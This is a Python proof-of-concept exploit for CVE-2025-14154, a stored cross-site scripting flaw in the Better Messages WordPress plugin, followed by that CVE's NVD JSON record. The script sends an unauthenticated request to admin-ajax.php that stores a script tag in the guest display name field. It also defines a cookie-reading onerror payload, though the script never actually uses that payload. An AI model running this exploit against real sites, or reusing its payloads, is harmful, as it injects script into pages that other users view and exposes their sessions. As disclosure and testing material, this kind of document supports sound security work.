CVE-2025-14154

import requests import random import string def generate_random_name(): return ''.join(random.choices(string.ascii_letters, k=8)) def exploit_stored_xss(target_url, malicious_payload): """ CVE-2025-14154 PoC - Better Messages Plugin Stored XSS via Guest Display Name Vulnerability: Stored XSS in guest display name field Affected: Better Messages plugin <= 2.10.2 Attack Vector: Unauthenticated attacker injects JS via guest user registration """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Generate random guest identifier guest_id = generate_random_name() # Malicious payload - XSS via display name # This will be stored and executed when other users view the message payload = f'{guest_id}<script>alert(String.fromCharCode(88,83,83))</script>' # Simulate guest message submission with malicious display name data = { 'guest_name': payload, 'message': 'Test message for XSS verification', 'action': 'bp_messages_send_reply' } try: response = requests.post(target_url, data=data, headers=headers, timeout=10) print(f'[+] Payload sent: {payload}') print(f'[+] Response status: {response.status_code}') return True except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': target = 'https://vulnerable-site.com/wp-admin/admin-ajax.php' xss_payload = '<img src=x onerror=alert(document.cookie)>' exploit_stored_xss(target, xss_payload) print('[+] Check if XSS is triggered when viewing messages')

{"cve": {"id": "CVE-2025-14154", "sourceIdentifier": "[email protected]", "published": "2025-12-17T06:15:41.747", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via guest display name in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3420771/bp-better-messages/trunk/inc/guests.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d68bbf0d-72e9-4295-a1e1-4abeb36cae1b?source=cve", "source": "[email protected]"}]}}